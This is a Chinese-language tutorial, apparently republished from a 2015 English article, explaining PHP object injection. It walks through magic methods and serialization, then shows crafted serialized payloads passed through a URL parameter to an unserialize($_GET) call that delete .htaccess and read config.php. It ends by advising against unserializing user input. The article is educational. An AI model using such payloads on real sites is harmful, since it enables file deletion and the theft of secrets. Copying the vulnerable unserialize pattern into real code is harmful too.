文章詳情頁

詳析php對象注入漏洞

瀏覽：52日期：2022-09-13 10:45:13

0x00 背景

php對象注入是一個非常常見的漏洞，這個類型的漏洞雖然有些難以利用，但仍舊非常危險，為了理解這個漏洞，請讀者具備基礎的php知識。

0x01 漏洞案例

如果你覺得這是個渣渣洞，那么請看一眼這個列表，一些被挖到過該漏洞的系統，你可以發現都是一些耳熟能詳的玩意(就國外來說)

WordPress 3.6.1

Magento 1.9.0.1

Joomla 3.0.3

Ip board 3.3.5

除此之外等等一堆系統，八成可能大概在這些還有其他的php程序中還有很多這種類型的漏洞，所以不妨考慮坐下喝杯咖啡并且試著去理解這篇文章。

0x01 PHP類和對象類和變量是非常容易理解的php概念，打個比方，下面的代碼在一個類中定義了一個變量和一個方法。<?php class TestClass { // 一個變量 public $variable = ’This is a string’; // 一個簡單的方法 public function PrintVariable() { echo $this->variable; } } // 創建一個對象 $object = new TestClass(); // 調用一個方法 $object->PrintVariable(); ?> 它創建了一個對象并且調用了 PrintVariable 函數，該函數會輸出變量 variable。如果想了解更多關于php面向對象編程的知識請點： http://php.net/manual/zh/language.oop5.php0x02 php magic方法php類可能會包含一些特殊的函數叫magic函數，magic函數命名是以符號“__”開頭的，比如 __construct, __destruct, __toString, __sleep, __wakeup 和其他的一些玩意。這些函數在某些情況下會自動調用，比如:__construct 當一個對象創建時調用 (constructor) __destruct 當一個對象被銷毀時調用 (destructor) __ toString當一個對象被當作一個字符串使用為了更好的理解magic方法是如何工作的，讓我們添加一個magic方法在我們的類中。<?php class TestClass { // 一個變量 public $variable = ’This is a string’; // 一個簡單的方法 public function PrintVariable() { echo $this->variable . ’ ’; } // Constructor public function __construct() { echo ’__construct ’; } // Destructor public function __destruct() { echo ’__destruct ’; } // Call public function __toString() { return ’__toString ’; } } // 創建一個對象 // __construct會被調用 $object = new TestClass(); // 創建一個方法 // ’This is a string’ 這玩意會被輸出 $object->PrintVariable(); // 對象被當作一個字符串 // __toString 會被調用 echo $object; // End of PHP script // php腳本要結束了， __destruct會被調用 ?> 我們往里頭放了三個 magic方法，__construct, __destruct和 __toString，你可以看出來，__construct在對象創建時調用， __destruct在php腳本結束時調用，__toString在對象被當作一個字符串使用時調用。這個腳本會輸出這狗樣：__constructThis is a string__toString__destruct這只是一個簡單的例子，如果你想了解更多有關magic函數的例子，請點擊下面的鏈接：http://php.net/manual/zh/language.oop5.magic.php0x03 php對象序列化php允許保存一個對象方便以后重用，這個過程被稱為序列化，打個比方，你可以保存一個包含著用戶信息的對象方便等等重用。為了序列化一個對象，你需要調用 “serialize”函數，函數會返回一個字符串，當你需要用到這個對象的時候可以使用“unserialize”去重建對象。讓我們在序列化丟進那個例子，看看序列化長什么樣。<?php // 某類 class User { // 類數據 public $age = 0; public $name = ’’; // 輸出數據 public function PrintData() { echo ’User ’ . $this->name . ’ is ’ . $this->age . ’ years old. ’; } } // 創建一個對象 $usr = new User(); // 設置數據 $usr->age = 20; $usr->name = ’John’; // 輸出數據 $usr->PrintData(); // 輸出序列化之后的數據 echo serialize($usr); ?> 它會輸出User John is 20 years old.O:4:'User':2:{s:3:'age';i:20;s:4:'name';s:4:'John”;}你可以看到序列化之后的數據中有 20和John，其中沒有任何跟類有關的東西，只有其中的數據被數據化。為了使用這個對象，我們用unserialize重建對象。<?php // 某類 class User { // Class data public $age = 0; public $name = ’’; // Print data public function PrintData() { echo ’User ’ . $this->name . ’ is ’ . $this->age . ’ years old. ’; } } // 重建對象 $usr = unserialize(’O:4:'User':2:{s:3:'age';i:20;s:4:'name';s:4:'John';}’); // 調用PrintData 輸出數據 $usr->PrintData(); ?> 這會輸出User John is 20 years old0x04 序列化magic函數magic函數constructor (__construct)和 destructor (__destruct) 是會在對象創建或者銷毀時自動調用，其他的一些magic函數會在serialize 或者 unserialize的時候被調用。__sleep magic方法在一個對象被序列化的時候調用。 __wakeup magic方法在一個對象被反序列化的時候調用。注意 __sleep 必須返回一個數組與序列化的變量名。<?php class Test { public $variable = ’BUZZ’; public $variable2 = ’OTHER’; public function PrintVariable() { echo $this->variable . ’ ’; } public function __construct() { echo ’__construct ’; } public function __destruct() { echo ’__destruct ’; } public function __wakeup() { echo ’__wakeup ’; } public function __sleep() { echo ’__sleep ’; return array(’variable’, ’variable2’); } } // 創建一個對象，會調用 __construct $obj = new Test(); // 序列化一個對象，會調用 __sleep $serialized = serialize($obj); //輸出序列化后的字符串 print ’Serialized: ’ . $serialized . ’; // 重建對象，會調用 __wakeup $obj2 = unserialize($serialized); //調用 PintVariable, 會輸出數據 (BUZZ) $obj2->PrintVariable(); // php腳本結束，會調用 __destruct ?> 這玩意會輸出：__construct__sleepSerialized: O:4:'Test':2:{s:8:'variable';s:4:'BUZZ';s:9:'variable2';s:5:'OTHER';}__wakeupBUZZ__destruct__destruct你可以看到，我們創建了一個對象，序列化了它(然后__sleep被調用)，之后用序列化對象重建后的對象創建了另一個對象，接著php腳本結束的時候兩個對象的__destruct都會被調用。更多相關的內容http://php.net/manual/zh/language.oop5.serialization.php0x05 php對象注入現在我們理解了序列化是如何工作的，我們該如何利用它?事實上，利用這玩意的可能性有很多種，關鍵取決于應用程序的流程與，可用的類，與magic函數。記住序列化對象的值是可控的。你可能會找到一套web程序的源代碼，其中某個類的__wakeup 或者 __destruct and其他亂七八糟的函數會影響到web程序。打個比方，我們可能會找到一個類用于臨時將日志儲存進某個文件，當__destruct被調用時，日志文件會被刪除。<?php class LogFile { // log文件名 public $filename = ’error.log’; // 某代碼，儲存日志進文件 public function LogData($text) { echo ’Log some data: ’ . $text . ’ ’; file_put_contents($this->filename, $text, FILE_APPEND); } // Destructor 刪除日志文件 public function __destruct() { echo ’__destruct deletes '’ . $this->filename . ’' file. ’; unlink(dirname(__FILE__) . ’/’ . $this->filename); } } ?> 某例子關于如何使用這個類<?php include ’logfile.php’; // 創建一個對象 $obj = new LogFile(); // 設置文件名和要儲存的日志數據 $obj->filename = ’somefile.log’; $obj->LogData(’Test’); // php腳本結束啦，__destruct被調用，somefile.log文件被刪除。 ?> 在其他的腳本，我們可能又恰好找到一個調用“unserialize”函數的，并且恰好變量是用戶可控的，又恰好是$_GET之類的。<?php include ’logfile.php’; // ... 一些狗日的代碼和 LogFile 類 ... // 簡單的類定義 class User { // 類數據 public $age = 0; public $name = ’’; // 輸出數據 public function PrintData() { echo ’User ’ . $this->name . ’ is ’ . $this->age . ’ years old. ’; } } // 重建用戶輸入的數據 $usr = unserialize($_GET[’usr_serialized’]); ?> 你看，這個代碼調用了 “LogClass” 類，并且有一個 “unserialize” 值是我們可以注入的。所以構造類似這樣的東西：script.php?usr_serialized=O:4:'User':2:{s:3:'age';i:20;s:4:'name';s:4:'John”;}究竟發生了什么呢，因為輸入是可控的，所以我們可以構造任意的序列化對象，比如：<?php $obj = new LogFile(); $obj->filename = ’.htaccess’; echo serialize($obj) . ’ ’; ?> 這個會輸出O:7:'LogFile':1:{s:8:'filename';s:9:'.htaccess';}__destruct deletes '.htaccess' file.現在我們將構造過后的序列化對象發送給剛才的腳本：script.php?usr_serialized=O:7:'LogFile':1:{s:8:'filename';s:9:'.htaccess”;}這會輸出__destruct deletes '.htaccess' file.現在 .htaccess 已經被干掉了，因為腳本結束時 __destruct會被調用。不過我們已經可以控制“LogFile”類的變量啦。這就是漏洞名稱的由來：變量可控并且進行了unserialize操作的地方注入序列化對象，實現代碼執行或者其他坑爹的行為。雖然這不是一個很好的例子，不過我相信你可以理解這個概念，unserialize自動調用 __wakeup 和 __destruct，接著攻擊者可以控制類變量，并且攻擊web程序。0x06 常見的注入點先不談 __wakeup 和 __destruct，還有一些很常見的注入點允許你利用這個類型的漏洞，一切都是取決于程序邏輯。打個比方，某用戶類定義了一個__toString為了讓應用程序能夠將類作為一個字符串輸出(echo $obj) ,而且其他類也可能定義了一個類允許__toString讀取某個文件。<?php // … 一些include ... class FileClass { // 文件名 public $filename = ’error.log’; //當對象被作為一個字符串會讀取這個文件 public function __toString() { return file_get_contents($this->filename); } } // Main User class class User { // Class data public $age = 0; public $name = ’’; // 允許對象作為一個字符串輸出上面的data public function __toString() { return ’User ’ . $this->name . ’ is ’ . $this->age . ’ years old. ’; } } // 用戶可控 $obj = unserialize($_GET[’usr_serialized’]); // 輸出 __toString echo $obj; ?> so,我們構造urlscript.php?usr_serialized=O:4:'User':2:{s:3:'age';i:20;s:4:'name';s:4:'John”;}再想想，如果我們用序列化調用 FileClass呢我們創建利用代碼<?php $fileobj = new FileClass(); $fileobj->filename = ’config.php’; echo serialize($fileobj); ?> 接著用生成的exp注入urlscript.php?usr_serialized=O:9:'FileClass':1:{s:8:'filename';s:10:'config.php”;}接著網頁會輸出 config.php的源代碼<?php $private_data = ’MAGIC’; ?> ps:我希望這讓你能夠理解。0x07 其他的利用方法可能其他的一些magic函數海存在利用點：比如__call 會在對象調用不存在的函數時調用，__get 和 __set會在對象嘗試訪問一些不存在的類，變量等等時調用。不過需要注意的是，利用場景不限于magic函數，也有一些方式可以在一半的函數中利用這個漏洞，打個比方，一個模塊可能定義了一個叫get的函數進行一些敏感的操作，比如訪問數據庫，這就可能造成sql注入，取決于函數本身的操作。唯一的一個技術難點在于，注入的類必須在注入點所在的地方，不過一些模塊或者腳本會使用“autoload”的功能，具體可以在這里了解http://php.net/manual/zh/language.oop5.autoload.php0x08 如何利用或者避免這個漏洞別在任何用戶可控的地方使用“unserialize”，可以考慮“json_decode“0x09 結論雖然很難找到而且很難利用，但是這真的真的很嚴重，可以導致各種各樣的漏洞。原文:http://securitycafe.ro/2015/01/05/understanding-php-object-injection/

PHP

上一條：PHP獲取上周、本周、上月、本月、本季度、上季度時間方法大全下一條：PHP使用代理訪問網站方法

相關文章：

1. Python3 json模塊之編碼解碼方法講解2. Linux刪除系統自帶版本Python過程詳解3. Python 制作查詢商品歷史價格的小工具4. Python 合并拼接字符串的方法5. python 使用事件對象asyncio.Event來同步協程的操作6. ASP基礎知識VBScript基本元素講解7. ASP.NET MVC使用jQuery ui的progressbar實現進度條8. Python 利用Entrez庫篩選下載PubMed文獻摘要的示例9. Python sublime安裝及配置過程詳解10. Python字符串到字節的轉換。雙反斜杠問題

排行榜

					
					Android 簡單的實現滑塊拼圖驗證碼功能
ASP.NET MVC使用jQuery ui的progressbar實現進度條
Android打包篇:Android Studio將代碼打包成jar包教程
springboot配置Jackson返回統一默認值的實現示例
淺談django不使用restframework自定義接口與使用的區別
樹型結構列出指定目錄里所有文件的PHP類
Linux刪除系統自帶版本Python過程詳解
ASP基礎知識VBScript基本元素講解
Python字符串到字節的轉換。雙反斜杠問題
Java Long類型對比分析
Python 合并拼接字符串的方法
				